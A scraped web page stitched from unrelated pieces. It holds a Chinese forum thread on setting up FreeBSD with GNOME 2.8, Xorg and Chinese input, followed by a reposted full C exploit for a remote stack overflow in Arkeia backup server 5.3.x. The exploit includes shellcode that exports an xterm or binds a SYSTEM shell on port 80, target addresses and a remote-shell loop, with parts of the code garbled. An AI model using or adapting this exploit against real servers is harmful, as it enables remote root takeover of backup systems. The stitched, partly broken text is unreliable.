type3php 5.3安装怎么安装

新手园地& & & 硬件问题Linux系统管理Linux网络问题Linux环境编程Linux桌面系统国产LinuxBSD& & & BSD文档中心AIX& & & 新手入门& & & AIX文档中心& & & 资源下载& & & Power高级应用& & & IBM存储AS400Solaris& & & Solaris文档中心HP-UX& & & HP文档中心SCO UNIX& & & SCO文档中心互操作专区IRIXTru64 UNIXMac OS X门户网站运维集群和高可用服务器应用监控和防护虚拟化技术架构设计行业应用和管理服务器及硬件技术& & & 服务器资源下载云计算& & & 云计算文档中心& & & 云计算业界& & & 云计算资源下载存储备份& & & 存储文档中心& & & 存储业界& & & 存储资源下载& & & Symantec技术交流区安全技术网络技术& & & 网络技术文档中心C/C++& & & GUI编程& & & Functional编程内核源码& & & 内核问题移动开发& & & 移动开发技术资料ShellPerlJava& & & Java文档中心PHP& & & php文档中心Python& & & Python文档中心RubyCPU与编译器嵌入式开发驱动开发Web开发VoIP开发技术MySQL& & & MySQL文档中心SybaseOraclePostgreSQLDB2Informix数据仓库与数据挖掘NoSQL技术IT业界新闻与评论IT职业生涯& & & 猎头招聘IT图书与评论& & & CU技术图书大系& & & Linux书友会二手交易下载共享Linux文档专区IT培训与认证& & & 培训交流& & & 认证培训清茶斋投资理财运动地带快乐数码摄影& & & 摄影器材& & & 摄影比赛专区IT爱车族旅游天下站务交流版主会议室博客SNS站务交流区CU活动专区& & & Power活动专区& & & 拍卖交流区频道交流区
空间积分0 信誉积分100 UID阅读权限20积分618帖子精华可用积分618 专家积分0 在线时间0 小时注册时间最后登录
丰衣足食, 积分 618, 距离下一级还需 382 积分
帖子主题精华可用积分618 专家积分0 在线时间0 小时注册时间最后登录
1. 安装时选择全部安装,省得以后麻烦,工作站么,又不是服务器。
2. 安装到ports时,只安装net下的cvsup,以后更新ports用。可以在此时选择安装x11下的gnome2-lite,但是我选择不装,我喜欢最新的gnome 2.8,而不是缺东西的2.6 lite。
& && && & #Xorg -configure
& && && & #cp xorg.conf.new /etc/X11/xorg.conf
& &Section &Screen&
& &EndSection
& &我的机器用,修改如下:
& &Section &Screen&
& && &&&Identifier &Screen0&
& && &&&Device& &&&&Card0&
& && &&&Monitor& & &Monitor0&
& && &&&DefaultDepth& & 24
& && &&&SubSection &Display&
& && && && && & Viewport& &0 0
& && && && && & Depth& &&&24
& && && && && & Modes& &&&
& && &&&EndSubSection
& &EndSection
export LANG=zh_CN.eucCN
export LC_CTYPE=zh_CN.eucCN
exec gnome-session
&&#cp /usr/share/examples/cvsup/ports-supfile /etc/
&&*default .FreeBSD.org
&&#cvsup -g -L 2 /etc/ports-supfile
&&#cd /usr/ports/x11/gnome2 && make install clean
&&#cd /usr/ports/chinese/fcitx && make install clean
&&export LANG=zh_CN.eucCN
&&export LC_CTYPE=zh_CN.eucCN
&&export XMODIFIERS='@im=fcitx'
&&exec fcitx&
&&exec gnome-session
&&/usr/ports/net/gaim& &IM(msn,icq等)
&&/usr/ports/graphics/gthum2 图片浏览和数码相机连接
&&/usr/ports/gimp& &&&图片编辑
&&/usr/ports/multimedia/mplayer& &windows媒体播放器
&&/usr/ports/multimedia/linux-realplayer realplayer播放器
style &gtk-default-zh-cn& {
& && &&&fontset = &-Arphic-AR PL KaitiM GB-medium-r-normal--0-0-0-0-p-0-gbk-0
& && && && && && &-taipei-*-medium-r-normal--*-*-*-*-*-*-gbk-0,\
& && && && && && &-*-*-medium-r-normal--16-*-*-*-*-*-gbk-0,*-r-*&
class &GtkWidget& style &gtk-default-zh-cn&
10.gnome 2.8是十分爽的。。。。。。
& &勾引一下,见谅。
空间积分0 信誉积分100 UID阅读权限20积分618帖子精华可用积分618 专家积分0 在线时间0 小时注册时间最后登录
丰衣足食, 积分 618, 距离下一级还需 382 积分
帖子主题精华可用积分618 专家积分0 在线时间0 小时注册时间最后登录
(94.06 KB, 下载次数: 49)
10:18 上传
下载次数: 49
(71.09 KB, 下载次数: 41)
10:14 上传
下载次数: 41
空间积分0 信誉积分100 UID阅读权限10积分12帖子精华可用积分12 专家积分0 在线时间0 小时注册时间最后登录
白手起家, 积分 12, 距离下一级还需 188 积分
帖子主题精华可用积分12 专家积分0 在线时间0 小时注册时间最后登录
空间积分0 信誉积分100 UID阅读权限20积分618帖子精华可用积分618 专家积分0 在线时间0 小时注册时间最后登录
丰衣足食, 积分 618, 距离下一级还需 382 积分
帖子主题精华可用积分618 专家积分0 在线时间0 小时注册时间最后登录
空间积分0 信誉积分106 UID58207阅读权限20积分679帖子精华可用积分681 专家积分0 在线时间74 小时注册时间最后登录
丰衣足食, 积分 679, 距离下一级还需 321 积分
帖子主题精华可用积分681 专家积分0 在线时间74 小时注册时间最后登录
原帖由 &eliumao& 发表:
空间积分0 信誉积分242 UID25176阅读权限50积分4659帖子精华可用积分4661 专家积分0 在线时间545 小时注册时间最后登录
小富即安, 积分 4659, 距离下一级还需 341 积分
帖子主题精华可用积分4661 专家积分0 在线时间545 小时注册时间最后登录
空间积分0 信誉积分100 UID阅读权限10积分16帖子精华可用积分16 专家积分0 在线时间0 小时注册时间最后登录
白手起家, 积分 16, 距离下一级还需 184 积分
帖子主题精华可用积分16 专家积分0 在线时间0 小时注册时间最后登录
空间积分0 信誉积分154 UID7795418阅读权限30积分1379帖子精华可用积分1379 专家积分0 在线时间56 小时注册时间最后登录
家境小康, 积分 1379, 距离下一级还需 621 积分
帖子主题精华可用积分1379 专家积分0 在线时间56 小时注册时间最后登录
firefly's patches are in ports now.
echo &WITH_CJK=yes& &;&; /etc/make.conf
then run make
空间积分0 信誉积分104 UID阅读权限0积分15帖子精华可用积分15 专家积分0 在线时间1 小时注册时间最后登录
帖子主题精华可用积分15 专家积分0 在线时间1 小时注册时间最后登录
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空间积分0 信誉积分154 UID7795418阅读权限30积分1379帖子精华可用积分1379 专家积分0 在线时间56 小时注册时间最后登录
家境小康, 积分 1379, 距离下一级还需 621 积分
帖子主题精华可用积分1379 专家积分0 在线时间56 小时注册时间最后登录
At first,cvsup your ports.
portupgrade -m WITH_CJK=yes freetype2 fontconfig libXft pango
Here's my desktop snapshot
北京皓辰网域网络信息技术有限公司. 版权所有 京ICP证:060528号 北京市公安局海淀分局网监中心备案编号:
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转载本站内容请注明原作者名及出处Arkeia 5.3.x Type 77 Request Remote Stack Overflow Exploit|
Arkeia 5.3.x Type 77 Request Remote Stack Overflow Exploit|
来源:vfocus.net 作者:vfocus 发布时间:
Arkeia 5.3.x Type 77 Request Remote Stack Overflow Exploit/** Knox Arkiea Server Backup* arkiead local/remote root exploit* Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE * Works up to current version 5.3.x ** ---------------** Linux x86:* ./arksink2 &arkeia_host& &target_type& &display&** Exports an xterm to the box of your choosing. Make sure to "xhost +" on* the box you're exporting to.* * A stack overflow is in the processing of a type 77 request. EIP is actually* overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we* have to write past EIP and insert a "safe" value. Put this value behind your* NOP+sc return address so it doesn't mess with the sled.** Since the buffer is so small, we initially send an invalid packet that ends* up on the heap a second before the overflow happens. If it is a high traffic* Arkeia server the heap might be a bit volatile, so play around with putting* nops+sc after the overwritten pointer. The heap method avoids non-exec stack* protection, however.** Includes targets for RH8 and RH7.2* * [user@host user]$ ./prog 1* [*] Knox Arkeia &= v5.3.x remote root/SYSTEM exploit* [*] Attacking LINUX system* [*] Exporting xterm to * [*] Connected to NOP+shellcode socket* [*] Connected to overflow socket* [*] Sending nops+shellcode* [*] Done, sleeping* [*] Done, check for xterm*** ---------------* * Windows x86:* ./prog &host& &target& &offset&** Spawns a shell on port 80 of the remote host** EIP is overwritten beginning with the 25th byte after the header. Since Windows* is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to* write an extra null past EIP. Another advantage here is that we can put all our* nops and shellcode in the same packet, but after the NULL. They will not be copied* onto the stack (and therefore not munge the pointer after it) but will remain* in memory as a raw packet. Fire up ollydbg, search for your nops and voila.** [user@host user]$ ./arksink2 3 0* [*] Knox Arkeia &= v5.3.x remote SYSTEM exploit* [*] Attacking Windows system* [*] Spawning shell on* [*] Connected to overflow socket* [*] Sending overflow* [*] Attempting to get remote shell, try #0* [!] connect: Resolver Error 0 (no error)* [*] Attempting to get remote shell, try #1* [!] connect: Resolver Error 0 (no error)* [*] Attempting to get remote shell, try #2* [!] connect: Resolver Error 0 (no error)* [*] Attempting to get remote shell, try #3* [!] connect: Resolver Error 0 (no error)* [*] Attempting to get remote shell, try #4* [*] Success, enjoy* Microsoft Windows 2000 [Version 5.00.2195]* (C) Copyright
Microsoft Corp.** C:\WINNT\system32&whoami* whoami* SYSTEM** C:\WINNT\system32&* ** ---------------* */#include &stdio.h&#include &stdlib.h&#include &unistd.h&#include &netdb.h&#include &sys/socket.h&#include &sys/errno.h&#include &sys/types.h&#include &netinet/in.h&#include &arpa/nameser.h&#define BUFLEN 10000 /* for readshell() */#define DATA_LEN 1000 /* overflow packet data section */#define HEAD_LEN 8 /* overflow packet header */#define NOP_LEN 20000 /* nop+shellcode packet */#define ARK_PORT 617 /* port Arkeiad listens on */#define SHELL_PORT 80 /* for the windows shellcode */#define NOP 0x90 /* Intel x86 */#define NUMTARGS 5 /* increase when adding targets */#define LINUX 1 /* Linux target type */#define WINDOWS 2 /* Windows target type */struct {char *u} targets[] = {{ "Redhat 8.0", 0x80ecf90, 0x080e0144, 68, LINUX },{ "Redhat 7.2", 0x80eddc0, 0x080eb940, 68, LINUX },{ "Windows 2k SP2, SP3, SP4", 0x007d2144, 0xdeadbeef, 28, WINDOWS },{ "Windows 2003 EE", 0x007b2178, 0xdeadbeef, 28, WINDOWS },{ "Windows XP SP1", 0x007d20e7, 0xdeadbeef, 28, WINDOWS },NULL};// Linux shellcode exports xtermconst char shellcode[] ="\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b""\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88""\x34\x32\x31\xd2\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d""\x7e\x19\x89\x7e\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e""\x36\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xac\xff\xff\xff""/usr/X11R6/bin/xterm8-ut8-display8";// Windows shellcode binds shell to port 80const char shellcode_win[] ="\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff""\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2""\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80""\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09""\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6""\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf""\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad""\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81""\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81""\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80""\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80""\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80""\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80""\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80""\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81""\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6""\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xbf\x62\x1f\x4c\xd5\x24\xc5\xd3""\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50""\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4""\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4""\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4""\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f""\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b""\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80""\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89""\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80""\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83""\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83""\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78""\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c""\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b""\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2b\xa2\x04";unsigned int resolve(char *hostname){u_long ip = 0;struct hostent *if ((int)(ip = inet_addr(hostname)) == -1){if ((hoste = gethostbyname(hostname)) == NULL){herror("[!] gethostbyname");exit(-1);}memcpy(&ip, hoste-&h_addr, hoste-&h_length);}return(ip);}int isock(char *hostname, int portnum){struct sockaddr_in sock_a;int num,fd_sock_a.sin_family = AF_INET;sock_a.sin_port = htons(portnum);sock_a.sin_addr.s_addr = resolve(hostname);if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) & 0){herror("[!] accept");return(-1);}if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a))){herror("[!] connect");return(-1);}return(sock);}int usage(char *progname){fprintf(stderr, "Usage:\n%s hostname target_num display (attacking Linux)\n", progname);fprintf(stderr, "%s hostname target_num offset (attacking Windows)\n", progname);for (i = 0; targets[i]. i++)fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);fprintf(stderr, "Example: %s 1\n", progname);exit(-1);}int getshell(int sock){char buf[BUFLEN];int nread=0;while(1) { fd_ FD_SET(0,&input); FD_SET(sock,&input); select(sock+1,&input,NULL,NULL,NULL); if(FD_ISSET(sock,&input)) { nread=read(sock,buf,BUFLEN); write(1,buf,nread); } if(FD_ISSET(0,&input)) write(sock,buf,read(0,buf,BUFLEN)); } }int lin(char *host, char *export, unsigned int tnum){char head[] = "\x00\x4d\x00\x03\x00\x01\xff\xff";char data[DATA_LEN];char sc_req[NOP_LEN*2];char *int datalen = 0;int port = ARK_PORT;int sock_overflow, sock_int nullmap = 0;sock_overflow = sock_nops = 0;retaddr = targets[tnum].safe = targets[tnum].datalen = targets[tnum].sock_nops = isock(host, port);if (sock_nops & 1)exit(-1);fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port);sock_overflow = isock(host, port);if (sock_overflow & 1)exit(-1);fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);// build data section of overflow packetmemset(data, NOP, DATA_LEN);// copy in return addressmemcpy(data+datalen - 8, (char *)&retaddr, 4);// we overwrite a pointer that must be a valid addressmemcpy(data+datalen-4, (char *)&safe, 4); datalen = ntohs(datalen);memcpy(head+6, (char *)&datalen, 2);// build invalid packet with nops+shellcodememset(sc_req, NOP, NOP_LEN+1);sc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);sprintf(sc, "%s%s%s", shellcode, export, "K");if (strlen(sc) + NOP_LEN & NOP_LEN*2-1) {fprintf(stderr, "[!] display name too long\n");exit(-1);}memcpy(sc_req+NOP_LEN, sc, strlen(sc));// send invalid nop+shellcode packetfprintf(stderr, "[*] Sending nops+shellcode\n");write(sock_nops, sc_req, NOP_LEN+strlen(sc)+1); fprintf(stderr, "[*] Done, sleeping\n");sleep(1);close(sock_nops);// send overflow, pointing EIP to above nops+scwrite(sock_overflow, head, HEAD_LEN); // 8 byte headerdatalen = ntohs(datalen);fprintf(stderr, "[*] Sending overflow\n");write(sock_overflow, data, datalen); // small overflow packetfprintf(stderr, "[*] Done, check for xterm\n");close(sock_overflow);}void windows (char *host, int tnum, int offset){char head[] = "\x00\x4d\x00\x03\x00\x01\xff\xff";char data[DATA_LEN];char sc_req[NOP_LEN*2];char *char *uint overflow_int datasiz = DATA_LEN;int datalen = 0;int port = ARK_PORT;int sock_overflow, sock_nops, sock_datalen = targets[tnum].ret = targets[tnum].targret +sock_overflow = isock(host, port);if (sock_overflow & 1)exit(-1);fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);// build data section of overflow packetmemset(data, NOP, DATA_LEN);memcpy(data+datalen - 4, (char *)&ret, 4);memcpy(data+DATA_LEN-strlen(shellcode_win)-1, shellcode_win, strlen(shellcode_win));// put size into headerdatasiz = ntohs(datasiz);memcpy(head+6, (char *)&datasiz, 2);fprintf(stderr, "[*] Sending overflow\n");write(sock_overflow, head, HEAD_LEN); // 8 byte headerwrite(sock_overflow, data, DATA_LEN); // large data sectionclose(sock_overflow);for (i = 0; i & 20; i++){sleep(1); fprintf(stderr, "[*] Attempting to get remote shell, try #%d\n", i);// connect to shellsock_shell = isock(host, SHELL_PORT);if (sock_shell & 0){fprintf(stderr, "[*] Success, enjoy\n");getshell(sock_shell);}}fprintf(stderr, "[!] Exploit failed or cannot connect to port 80\n");exit(-1);}int main( int argc, char **argv){/* first 2 bytes are a type 77 request *//* last two bytes length */char *char *int datalen = 0;int offset = 0;if (argc == 4){host = argv[1];tnum = atoi(argv[2]);if (targets[tnum].targtype == LINUX)export = argv[3];elseoffset=atoi(argv[3]);if (tnum & NUMTARGS || tnum == 0){fprintf(stderr, "[!] Invalid target\n");usage(argv[0]);}}else{usage(argv[0]);}tnum--;fprintf(stderr, "[*] Knox Arkeia &= v5.3.x remote root/SYSTEM exploit\n");fprintf(stderr, "[*] Attacking %s system\n", targets[tnum].os);if (targets[tnum].targtype == LINUX ){fprintf(stderr, "[*] Exporting xterm to %s\n", export);lin(host, export, tnum);}else if (targets[tnum].targtype == WINDOWS){fprintf(stderr, "[*] Spawning shell on %s:%d\n", host, SHELL_PORT);windows(host, tnum, offset);}else{fprintf(stderr, "[!] Unknown target type: %d\n", targets[tnum].targtype);exit(-1);}}
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